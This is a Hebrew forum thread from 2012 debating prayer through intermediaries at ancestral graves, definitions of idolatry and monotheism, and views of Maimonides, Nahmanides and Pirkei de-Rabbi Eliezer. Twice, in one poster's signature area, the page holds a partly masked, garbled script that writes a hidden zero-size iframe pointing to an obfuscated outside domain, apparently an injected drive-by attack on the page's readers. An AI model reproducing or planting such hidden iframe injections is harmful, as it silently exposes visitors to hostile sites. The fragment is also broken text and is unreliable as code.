| נשלח ב-17/6/2012 20:09 |
|
| |
תפילה דרך אמצעי / על קברי אבות
ידוע הפולמוס סביב פיוטי הסליחות 'מכניסי רחמים' ו'מידת הרחמים עלינו התגלגלי', האם נכון לאומרם או לא.
כבר בתקופת הראשונים (הרוקח ועוד) היו שנמנעו מלאומרם משום שאין להתפלל על ידי אמצעי, ואף היו שהתבטאו בחריפות כנגד אותם תפילות.
והנה בשבת זו נתקלתי בגמ' סוטה ל"ד: "אמר רבא: מלמד, שפירש כלב מעצת מרגלים והלך ונשתטח על קברי אבות, אמר להן: אבותי, בקשו עלי רחמים שאנצל מעצת מרגלים".
ותמהתי, מה זה שונה מתפילת מכניסי רחמים ? (עד שראיתי את הגמ' חשבתי שכלב התפלל להשם ישירות, ויתכן וקברי אבות מסוגלים יותר לתפילה, או משהו כעין זה. אבל מנוסח תפילת כלב המפורש בגמ' אנו למדים שהוא פנה לאבות כאמצעי שיבקשו עליו רחמים מאת ה')
|
|
|
|
| נשלח ב-20/6/2012 12:18 |
|
| |
רציוס'
הרשה לי לקצר על מנת להאריך בל"נ מאוחר יותר.
מה שכתבת שנושאים אינם שונים "מהותית" סבורני שאדרבה, מיון יאפשר לנו לזהות "מהויות". כמובן, אולי יתברר לנו ששימושי הלשון הטבעיים אכן טעונים בירור ושינוי, אולי מהקצה לקצה.
למשל, כמו בדוגמא שלך, אני חש, בטוח ואף יודע שיש הבדל אם מושא עבודתי הוא ה' או להבדיל אליל.
יש גם לחלק בין מעשי פולחן אופייניים (קרבן שכולל שחיטה והגשה והעלאה על אש וכיו"ב) וניסוך, לבין מעשים אחרים.
יש גם לחלק בין תחושות נפשיות (הערצה, אמון, תקוה) לבין מעשים.
וכל החילוקים האלו, ועוד הרבה, הם חשובים מאד.
מה שכתבת יכול לספק חומר רקע למיון. ועל זה ודאי יש להוסיף.
אני ממליץ שתערוך רשימה כזו.
מי הם האובייקטים שעליהם נאמר "עבודה זרה".
האם יש צורות פולחן מסויימות? האם כל מעשה "לשם" הוא איסור?
האם האיסור נאמר רק על מעשים או גם על דיבורים (תפילה אבל לא רק. למשל שבועה בשם) וגם על הרגשות ומחשבות.
אני מציע אינטואיציה שמן הסתם היא נכונה ונוגעת לדברים שכתבת.
כאשר המעשים (המצוות או מקבילותיהן) מכוונים כלפי אליל, זה איסור עבודה זרה.
כאשר המעשים מכוונים והמחשבות מאמינות בתכנים שגויים לגבי ה' אלקי ישראל, אז זה איסור מסוג אחר, וכנראה יש לכנותו "מינות".
זו חלוקה נכונה וחשובה ויעילה. כמובן אפשר לערער עליה.
קיצרתי ויש להמשיך עוד הרבה. אני מקוה לעזרתך.
|
|
|
|
| נשלח ב-19/6/2012 20:16 |
|
| |
כדאי לזכור שלפי הר"מ באדרת תחה"מ דורות ראשונים היו "כופרים" ע"פ הגדרותיו הוא והאמונה נשתלה בעם לאט לאט. אם כך היש מניעה עקרונית לומר שאכן לקו חכמים מסויימים במשהו? אנו "סומכים" על הראשונים לא כאמצעי לבירור האמת (שזה העניין בנושאים השקפתיים, ובו כל אחד יכול לטעות כי אין אדם בארץ אשר יצדק תמיד) אלא כאמצעי לקביעת ההלכה במידה ואנו כפופים להכרעתם
|
|
|
|
| נשלח ב-19/6/2012 20:15 |
|
| |
מיימוני,
אינני עד כדי כך טיפש כך שתוכל למרוח אותי באמירה "אם אנשק את הפסל הוא יעזור לי". אף אחד לא עובד לפסילים. הפסילים מייצגים ישויות 'רוחניות' שמתגלמות בהם או לפחות מייצגים לאדם הפשוט, הלא-פילוסוף, את האלוהות, דרך שתאפשר לו לקיים עם האלוהות אינטראקציה, בדומה לתפילה לי-הוה (מה אתה חושב, שלהינדואיזם לא יכול לקום אפולוגטיקן כמו הרמב"ם שיאמר שכל מה שכתוב על האלוהות המתגלמות לפסילים זה היה רק כדי לסבר את האוזן? שערי אפולוגטיקה דתית לא ננעלו מעולם...). מבקשים עזרה מישות חיצונית, שיכולה להיות בנאדם או ישות לא אנושית. אם אני מכבד את ייצוגה בעולמנו השפל, אני מכבד אותה, ואם אני מנשק אותה זה מצביע על אהבתי לאותה ישות (בדומה לנשיקת ספר תורה המצביעה על אהבה לאל י-הוה) ולכן הסיכוי היא תעזור לי נעשה גדול יותר.
לגבי קבלת אלוהות: מהי קבלת אלוהות? הגדרה! אתה אוהב לשחק פילוסוף, נכון? היה זה סוקרטס כמדומני שהצביע על כך שמטרה ראשונית של הפילוסוף היא להגדיר את השיח. אם בקבלת אלוהות הכוונה להצהרה שישות X בראה את העולם ex nihilo, אזי באופן אירוני כל האלים הפוליתאיסטים אינם אלים, אלא סתם חייזרים שניתן לדון אם הם קיימים ומקיימים אינטראקציה עם עולמנו (חוזק הראיות לכך = לראיות שהאל המונותאיסטי י-הוה/God/الله מקיים אינטראקציה כזו (לפחות ב 2000 השנים האחרונות) = 0). למעשה פוליתאיזם עתיק אינו עבודה זרה והמלחמה בו הייתה לשווא. אם בקבלת אלוהות הכוונה להצהרה שישות X היא בעלת כוחות ובחירה ושיש לה השפעה על עולמנו, הרי שגם הרמב"ם שטען שכוכבים הם בעלי נפש הוא עובד כוכבים ומזלות על פי ההגדרה המודרנית. וממנו למדנו שמותר להגדיר את חכמי הדורות הקודמים כעובדי אלילים, כך שלא יתלונן. אם בקבלת אלוהות הכוונה להצהרה שאנחנו מקבלים את מרותה של ישות X שהיא בעלת כוחות ובחירה ושיש לה השפעה על עולמנו, אינני רואה מה ההבדל בין לבין לקבל מרותו של אדם (זכורני שמיכאל אברהם טען שהמקבל על עצמו סט ערכי מוסר שמקורו אינו האל המונותאיסטי הוא בעצם עובד אלילים. זה זה. כמובן שהוא פתר את הבעיה על ידי ההנחה שערכי המוסר ההומניסטיים מקורם באלוהים - למרות שאין לך בסיס בתורה, אלא מ'סברה'. סוג של בינגו דתי). ואם גופו של האדם עבר את עולמנו הפיזי ותודעתו קיימת (כך על פי ההנחה הדואליסטית) אז פתאום נהיה אסור לפייסו ולבקש ממנו בקשות? דרך אחרת לחשוב על עבודת אלילים היא במובן לא פילוסופי, כמו שחילונים ואתאיסטים 'עמך' חושבים על זה, כאשר פעולות פיזיקליות (שריפת ילדים, קיום יחסי מין במקדש, שריפת חיות משק, חיתוך אברי מין של ילדים, נענוע ענפי עצים, השפרצת דם חיות משק שחוטות על מזבחות על פי תבנית ספציפית שהסוטה ממנה מקבל עונש מוות) הן 'עבודת אלילים' ו'פאגאניזם', ופעולות יותר פסיכולוגיות ומופשטות כמו תפילה, אהבת האל, וכו' אינן עבודת אלילים. אבל חילוק זה כלל לא מתייחס למושאן של כל הפעולות האלו (י-הוה או זאוס) וכמו כן אין בו טעם פילוסופי (שכן אל טרנסצנדטי, כשם שאינו רעב ואוהב להסניף צמחים ארומטיים גם אינו ילד מוזנח שצריך שכולם יביעו כלפיו אהבה או סופר-מגלומן שזקוק שיהללו אותו כל יום כל היום כל האנשים. ואם הוא לא כזה טרנסצנדנטי הוא עלול להנות משני סוגי הדברים. כך שאם עושים את הפעולות האלו לשמו - אין הבדל ביניהן. ואם עושים זאת למען ההרגשה האישית, כל אחד וטעמו: אחד אוהב מועדונים ואחד אוהב לקרוא ז'ורנלים מדעיים; אחד קורא לאהובתו כו*ית ומקדיש לה שירי דודו אהרן ואחר קורא לה היפה בנשים ומקדיש לה פואמות של שייקספיר; אחד מתחבר לאל על ידי פעולות גסות ואחר על ידי פעולות עדינות. אף אחד לא עדיף מהאחר. בוודאי שלא ברמה שיש להרוג את הגסים יותר).
תבין: זה שתחליף את המילים, ולאותן פעולות תקרא הערצה, בקשה, ריצוי, צליית בשר בעלי חיים למען יתענג האדם המוערץ על אכילת בשרם ושריפת צמחים ארומטיים כדי שיתענג על הריח, ריצויו על ידי הפרחת סופרלטיבים אודות תכונותיו המפוארות והשפלת העצמי כשהן מבוצעות כפי אדם, וקבלת אלוהות, תפילה, ריצוי (אותה מילה...) הקרבת קרבנות והקטרת קטורת, הלל והכנעה כשהן מבוצעות כלפי ישות חוץ פלנטרית ו/או לא-פיזיקלית, לא יהפוך את אותן פעולות לפעולות שונות מהותית.
 |
|
|
|
|
| נשלח ב-19/6/2012 18:49 |
|
| |
רציוס'
שכחתי את שאלתך השניה. אקצר.
אני מציע שנשמור אותה לאשכול אחר על המונותיאיזם של אברהם.
זאת למרות שחלקים ממנה לדעתי אינם רציניים וקשה לי להאמין שהתכוונת באמת לכל מה שכתבת.
אבל אם תרצה, בבקשה, פתח עוד אשכול. המלצתי על כותרת בתחילת דברי.
|
|
|
| נשלח ב-19/6/2012 18:46 |
|
| |
רציוסקפטי
חוששני שאיני מסכים עם הניסוח שלך לדברי.
אני סבור שכאשר ממלאים פקודות או עושים רצון מלך בשר ודם אין זה "פולחן".
אך אם המלך יצוה להקריב לפסל שלו, זו כבר עבודה זרה.
לפיכך המשפט
"פולחן לאדם לא נחשב ל'עבודה זרה' ופולחן לישויות לא-אנושיות נחשב ל'עבודה זרה'"
אינו מייצג מה שאני סבור.
אנסה לפרט יותר כי הנושא באמת קשה להגדרה עבורי.
אפשר לתאר את הציות האנושי או החנופה האנושית לאדם בתור עבודה זרה.
אבל כמדומה שזה פשוט לא נכון.
היכן ההבדל נעוץ? ניתן לחשוב על כמה הבדלים, שכולם מעוגנים במקורות.
למשל, אחד ההבדלים בין עבודה זרה למה שאינו כזה הוא "קבלת אלוהותו".
אמנם יש בעיה עם המינוח הזה. מהי "קבלת אלוהותו"?
אם אני יודע (או מאמין) שמלך מסוים יכול להרוג אותי על כך שלא עמדתי בשעה שנכנס לחדר, או שלא ישבתי בשעה שהתיישב, ולכן אני עושה בדיוק לפי ההוראות, האם זו עבודה זרה? האם הכרתי בעוצמה שברשותו, כולל כפיה (או אלימות) זו "קבלת אלוהותו"?
ומצד שני, אם אדם מחבק ומנשק פסל בתקוה שלא ירע לו או יועיל לו, כגון (דוגמא שלא מופיעה ברמב"ם אבל בארכיאולוגיה ובהיסטוריה) להחזיק פסלון של אלילת הפריון כדי לקבל שפע של בנים, האם זו עבודה זרה?
לצערי אין לי תשובות ברורות "מבחינה פילוסופית". יש לי, כמו לכולנו, אוסף של מקרים מוכרים מהמקורות, ויש לי אינטואיציות שמספיקות כדי לומר: זה עבודה זרה וזה לא. ניסוח של קריטריון באופן מספק כך שאני ואולי אתה נסכים: איזה יופי, יש לנו תשובה! התקוה הזו עדיין מחכה למימוש.
וראוי לעבוד עליה. אבל זה לוקח זמן, מחשבה, ניסויים מחשבתיים, ועוד.
אמנם אחד הדברים שיש להקפיד עליהם הוא זהירות בשימוש במילים.
למה אני מתכון?
בתולדות המחשבה היהודית בדורות האחרונים נעשה שימוש (בעקבות חז"ל) במילים "כאילו עובד עבודה זרה" או "הרי זו עבודה זרה" כדי להפריז בחשיבותם של כשלונות ועבירות מסויימים.
לדוגמא, כל הכועס כאילו עובד עבודה זרה.
כל מי שרודף אחרי הנאותיו משרת את עצמו ולכן זו עבודה זרה.
הדוגמא הראשונה היא כמובן מהתלמוד. השניה עשויה להיות התבטאות של "משגיח".
אבל שתי אלו אינן עבודה זרה (אני מקוה שתסכים) ולכן חבל לבזבז עליהן זמן.
אולי כשלב ראשון נתחיל לאסוף דוגמאות ברורות של עבודה זרה מהמקורות, ושל מה שראוי לדעתנו לשמש כדוגמאות לעבודה זרה, ובמקביל נציע הגדרות מהי עבודה זרה. ונחפש מקרי בינים.
|
|
|
|
| נשלח ב-19/6/2012 18:30 |
|
| |
סימני שאלה
אנסה לענות:
א.האם הרמב"ן האמין שיש מצווה להקריב לכחות אחרים?
לפי משמעות לשונו ולפי הסברה ודאי שלא.
הוא כן האמין שאם ה' מצוה להביא מעין קרבן ל"כוח אחר" אז זו מצוה.
האם הוא האמין שהספר פדר"א הוא מרז"ל?
אני סבור שכן. ואין זה המקרה היחיד שכל מה שבא מדורות קדומים נחשב בעיני רבותינו בעבר לספר קדוש וראוי.
ב. האם כמו הרמב"ן סברו עוד ראשונים?
לא ידוע לי לכאן או לכאן. כלומר, אני בור גם בדבר זה.
האם זה עבודה זרה? קרוב לעבודה זרה?
אם כוונתך ב"זה" להקרבת השעיר לעזאזל, אז לפי הרמב"ן זו לא עבודה זרה כי ה' צווה על זה, ולפי הרמב"ם זו עבודה זרה מפני שאין כזו ישות שתקבל את הקרבן וה' גם לא יצוה לעולם על הקרבה ל"כוח" אחר. ואדרבה, זו היתה טעותם של בני דור אנוש שכך החלו לעבוד לכוכבים, לפי התיאוריה הדתית-היסטורית של הרמב"ם.
ג. שאלת: למה אתה סומך עליהם בהלכה ובמסורת התורה, אחרי שאתה יודע שטעו בדברים חמורים כאלה?
אתחיל מהסוף. היכן מצאנו ש"עוד" ראשונים טעו כמו הרמב"ן ומה הם "עוד דברים חמורים" שבהם טעו?
ובמה נבדלות טעויות זו מזו, לומר שזו חמורה וזו לא? (יש תשובה, אבל צריך להגדיר).
בוודאי שיש מחלוקות שונות בראשונים, כפי שיש גם בגמרא.
ומה פירוש "סומך עליהם"?
אם הכוונה שדבריהם בדרך כלל ראויים ללימוד ולבחינה, אני מסכים.
וראה נא באשכול שפתחתי על "אמונת חכמים של חכמים" מול זו של ההמון.
אם הכוונה שיש לנו לאמץ את דבריהם רק בגלל שהם אמרו אותם, בין נבין בין לא נבין, אין זו דרכי.
אמנם אם יש כאלו שסבורים שברגע שמשהו כתוב הוא כבר מחייב, למאמין כזה יש בעיה...
|
|
|
|
| נשלח ב-19/6/2012 14:39 |
|
| |
מיימוני,
פשוט חזרת על המציאות שפולחן לאדם לא נחשב ל'עבודה זרה' ופולחן לישויות לא-אנושיות נחשב ל'עבודה זרה', לא הצעת רציונל לחלק בין המקרים. שאלתי נותרה בעינה: מבחינה פילוסופית, מאי שנא?
אגב, איפה בתנ"ך (ולא באגדות חז"ל) נאמר שאברהם היה מונותאיסט ו/או ראש וראשון למונותאיסטים? במקרא, עד כמה שזכור לי, מסופר על אינטראקציה בין אברהם לאל/ים 'י-הוה' ו'אל שדי'. הסכמים הדדיים וכו'. אבל איפה כתוב שהוא היה מונותאיסט?
|
|
|
|
| נשלח ב-19/6/2012 12:05 |
|
| |
מיימוני הנכבד תודה על התשובה המפורטת, אבל, אחרי כל הפירוט, לא ענית לשאלתי. הרמב"ן האמין שיש מצווה להקריב לכחות אחרים? הוא האמין שהספר פדר"א הוא מרז"ל? וכמותו עוד ראשונים ואחרונים רבים? זה עבודה זרה? קרוב לעבודה זרה? למה אתה סומך עליהם בהלכה ובמסורת התורה, אחרי שאתה יודע שטעו בדברים חמורים כאלה?
???
|
| נשלח ב-19/6/2012 07:29 |
|
| |
סימני שאלה
ברוך הבא אל הפורום!
צר לי שיצאה מכשלה מתחת ידי. כלומר, הטעיתי.
האם נתתי מקום למחשבה כי רוב רבותינו בימי התלמוד האמינו בעבודה זרה?
עלי לעיין שוב במה שכתבתי.
כמדומה שציינתי שתמיכה ברעיון שיש לעבוד לכוחות שאינם ה' מצויה רק בספר פרקי דר' אליעזר, שאינו לרבי אליעזר למרות שמו, והוא מאוחר מאד - מימי ראשית האיסלם.
נכון שהרעיון הזה קנה שביתה אצל כמה מפרשים ידועים, ומעל כולם הרמב"ן.
אולם קודם לכן - עד כמה שאני יודע - אין לו זכר. הדיון על שעיר לעזאזל כקרבן לישות שקיימת ככוח עצמאי מתחיל רק שם, במאה השביעית אחרי הספירה.
וגם כאן, יש לשים לב, הטענה של המחבר ואחר כך של הרמב"ן אינה שעבודת ישות אחרת היא מצוה או תועלתית, אלא רק שה' ציווה לתת לו פולחן באופן ייחודי, ואילולא כן היה הדבר אסור.
זה עדיין חמור מאד לדעתי, אבל לא פוליתיאיזם.
ככלל, יש להבדיל בין כמה שיטות מחשבה.
א. מונותיאיזם. המילה הזו מצביעה על האמונה שיש אלוקים אחד בלבד. האמונה הזו מוכרת בכל התנ"ך והיא מיוחסת בו לאברהם אבינו.
חוקרים שונים ניסו לערער עליה, ובמיוחד בדור האחרון ערעור זה רווח גם אצל יהודים חוקרי מקרא. איני רוצה לערבב את הנושאים, כי לדעתי זו טעות אבל חבל להכניס את הנושא הזה לאשכול הזה, שרצה לעסוק בתפילה בקברי אבות. וכמדומה שהנושא הזה נשכח. גם משום שאני עצמי התייחסתי לפרטים מתקופות אחרות. כמו בסעיף זה.
ב. פוליתיאיזם. זו אמונה שיש אלילים רבים. ואולי לכל אומה אלילים שלה וכולם קיימים וכולם בעלי שליטה וכוחות.
זו אמונה פרימיטיבית, אבל בגרסאות שונות היא רווחה בכל ההיסטוריה. האם אמונה שיש כוח בשם שטן שנאבק באלוקים ולמעשה העולם החומרי בשליטתו וכך יהיה עד שיבוא המשיח בן האלוהים - איך יש לדרג את האמונה הזו? האין היא דואליסטית?
היא מצויה בנצרות. אבל אפשר למצוא מוטיבים דואליסטיים - מאבק בין הטוב לרע גם בקבלה, החל מדור מסויים, וגם בספרים החיצוניים שנכתבו בידי בית שני. והעדויות הראשונות לתפיסה דואליסטית מוכרות בפרס העתיקה, כבר בימי בית ראשון כמדומה.
*** בכל הדורות היו יהודים שהאמינו בשטויות. גם בדורנו וגם בימי בית שני ובית ראשון. היו יהודים שנתפסו לגרסה מוקדמת של הנצרות במאות השנים הראשונות שלה, לפני שהתגבשו אמונות נוצריות ששוב לא התאימו כלל לאמונות ישראל, כך שיהודי יכול היה לחוש שהוא יהודי טוב וגם נוצרי. היום יש מאמיני קבלה שבעיני הם שוגים ומאמינים בעבודה זרה (כפי שיתבאר). אבל כל זה לא חדש. בימי הנביאים עבדו עבודה זרה, וגם כאשר משה עלה להר סיני בנו בינתים את העגל ועבדו לו.
*** הוראה שיש לעבוד עבודה זרה, בין בגלל שזה "עובד" ומועיל, בין בגלל שה' צווה על זה (ויש הבדל בחומרה בין שתי אמונות אלו) - היא עבודה זרה. אבל גם האמונה שיש כוחות פעילים, שה' נתן להם מקום, היא אמונה מזיקה ושגויה. ואמונה זו מצויה אצל רבנים והוגי דעות המשתייכים לזרם שנחשב לגיטימי. למשל הרמח"ל.
*** כאשר אומרים שכדאי לציית לחזק כי הוא יכול לעזור לך, האם זו עבודה זרה? זו שאלה טובה מאד שהעלה רציוסקפטי. אבל סבורני שיש הבדל בין הטענות הבאות:
א. אלכסנדר, נפוליאון, אובאמה, כולם מנהיגים רבי עוצמה בשעתם, ולכן כדאי למצוא חן בעיניהם ולהחמיא להם ולעשות את רצונם כדי לקבל טובות הנאה.
ב. השטן הוא כוח רב עוצמה ולכן כדאי למצוא חן בעיניו כדי לקבל טובות הנאה.
ג. זאוס (ראש אלילי יוון), ברהמה (מאלילי הודו), אהרימן (כוח הרע בדואליזם הפרסי העתיק), כולם כוחות רבי עוצמה ולכן כדאי לעבוד להם ולקבל טובות הנאה.
כמדומה שסעיפים ב ו-ג הם מבטאים אמונות של עבודה זרה (ושוב, בשתים: הכרה בכוחות שאינם קיימים וקריאה לעבודתם).
אבל סעיף א מבטא רק עצה תועלתנית. כדאי לציית למי שחזק.
אם נפוליאון, אלכסנדר ואובאמה היו מציבים פסל שלהם ותובעים להקריב לו קרבנות, זו כבר היתה עבודה זרה האסורה. כפי שנהג בשעתו אנטיוכוס ממלכי סוריה, וגרם למרד החשמונאי.
יתכן שקשה להגדיר את ההבדל בין תביעת מלך או נשיא שיעמדו לכבודו ויצייתו להוראותיו לבין תביעת מלך שיקריבו קרבנות לפסל שלו. האם אלו תביעות שונות לגמרי מהותית או שהן מצויות על רצף? אבל עדיין הסוג האחרון, תביעת קרבן, היא תביעה לעבודה זרה, ואילו הראשונות, בקשה לכבוד וציות, הן מנהגי מלכים, ואינן עבודה זרה.
|
|
|
|
|
| נשלח ב-19/6/2012 01:57 |
|
| |
| מיימוני כתב: |  | רציו
האם ההגדרה של הרמב"ם היא חידוש שלו?
איזה חלק ממנה?
האם לפי פרשנות מסויימת של הרמב"ם לא יצא שרק הפילוסוף כמו הרמב"ם נקי מכל עבודה זרה?
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
|
|
מונותאיזם בגירסת היהדות החז"לית, נאמר, הוא אמונה באל אחד שיצר את העולם, על כוחות וחוקי הטבע, ex nihilo (באמונה ששלטה בימי בית ראשון לא בהכרח שזה היה כך, אפילו כשהיה מונותאיזם ולא רק הנותאיזם, ואכמ"ל) פוליתאיזם הוא אמונה בריבוי ישויות בעלות כוחות. הפוליתאיזם שנפוץ בעבר האמין שכולן כפופות לחוקי הטבע, חלקן יצרו את חלקן האחר (בטרמינולוגיה תאיסטית מודרנית ישויות כאלו לא מוגדרות כאלים, ולכן מדובר בעצם באתאיזם + אמונה בחייזרים עם טכנולוגיה מתקדמת. ראיתי את התובנה הזו ב'אקדמיה ליהדות' והסכמתי עם הרעיון) לכן קשה להנגיד בין שתי העמדות. אם וכאשר המונותאיזם היהוויסטי הגדיר את י-הוה ככפוף לחוקי הטבע (אם כי אולי הרבה יותר גדול מאלוהי העמים האחרים), היה ניתן להנגיד ביניהן בקלות. לחילופין, ניתן להנגיד מונותאיזם מודרני עם עמדה (היפותטית) שבה את העולם, על כוחות וחוקי הטבע, יצרו מספר ישויות ex nihilo.
כך או אחרת, ברור שקיימות בעולם ישויות בעלות כוחות שמאופיינות ב so-called 'בחירה חופשית' (בלי להכנס לבעיה הלוגית שבמושג) - בני אדם. ישויות אלו מסוגלות לקדם את האינטרסים שלך אם תרצנה, ויש אפשרות לגרום להן לעשות כך (לבקש מהן). ככל הידוע לי, אין ביהדות איסור להלל בני אדם, להשתחוות להם, להביא להם אוכל, לקבל אותם על עצמנו כישות מחוקקת, ולבקש מהם בקשות = פעולות שעושים ביחסים עם אלוהים = לפלוח לבני אדם. אז מדוע יגרע חלקם של המלאכים / כוכבים בעלי נפש / שטן / חייזרים (בהנחה המפוקפקת שאלו קיימים, בעלי יכולת השפעה על עולמנו, וניתן לתקשר איתם, כמובן)? בגלל שהם רחוקים מאיתנו? בגלל שהם במימד so-called 'לא-פיזי'?
לדעתי מונותאיזם יוגדר כאמונה שיש רק ישות אחת שיצרה את העולם (כלומר אלוהות-במובן-המודרני יחידאית), על כוחות וחוקי הטבע שלו, ex nihilo. ותו לא מידי. ממי לבקש בקשות אין זה מעניינו של התאיזם לפי ההגדרה המודרנית וזה גורם להקלע לאינקונסיסטנטיות.
|
|
|
|
| נשלח ב-19/6/2012 01:04 |
|
| |
כי הם אונזערע?
|
|
|
|
| נשלח ב-19/6/2012 00:45 |
|
| |
עליית הדורות.
|
|
|
|
| נשלח ב-19/6/2012 00:34 |
|
| |
אם רבים מראשונינו היו עובדי עבודה זרה לדעתו הנכונה והצודקת של מיימוני, למה שנסמוך עליהם בשאר הענינים שהמסורת עברה על ידם?
???
|
|
|
|
| נשלח ב-19/6/2012 00:08 |
|
| |
רציוס'
דעה שיש לעבוד לישויות אחרות מצויה, עד כמה שידוע לי, כבר בפרקי דר' אליעזר, ושוב משמשת את הרמב"ן בפירושו למצות שעיר לעזאזל.
ושוב, מאוחר יותר, בקבלת הזוהר ועוד. אבל השאלה שלך היתה על חז"ל, ועד כמה שידוע לי, הזוהר מאוחר הרבה יותר.
בוודאי שלפי הרמב"ם דעת פרקי דרבי אליעזר שהבאת השעיר לעזאזל היא עבור ישות כזו, עזאזל, אזי מי שסבור כך הוא עובד עבודה זרה.
וכן גם דעתי שלי - אם זה קובע משהו.
__תוקן בכל מקום שאני מזכירו ל"פרקי דרבי אליעזר" מפני שאין כמעט קשר בין רבי אליעזר התנא לבין הספר המאוחר, שלפחות חלקו נכתב בימים שלאחר הופעת האיסלם. בשעתו היה לנו אקדמאי חרדי שהתמחה בפרקי דר' אליעזר, וכבר שכחתי את ניקו, והוא פתח כמה אשכולות בנושאים אלו ואחרים על החיבור._______________
שומר פיו ולשונו - שומר מצרות נפשו
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
תוקן על ידי מיימוני ב- 19/06/2012 00:09:50
שומר פיו ולשונו - שומר מצרות נפשו
< type="text/">document.write("");>
|
|
|
|
| נשלח ב-18/6/2012 22:38 |
|
| |
לא מגשימים.
עובדי אלילים.
היינו, מאמינים שיש ישויות אחרות שיש לפלוח אליהם ו/או בעלי כוחות בלתי תלויים ב one true God (גם אם האחרון הוא זה שברא אותם)
למשל, מתים (עונה על קריטריון א') או השטן (עונה על קריטריון ב').
|
|
|
|
|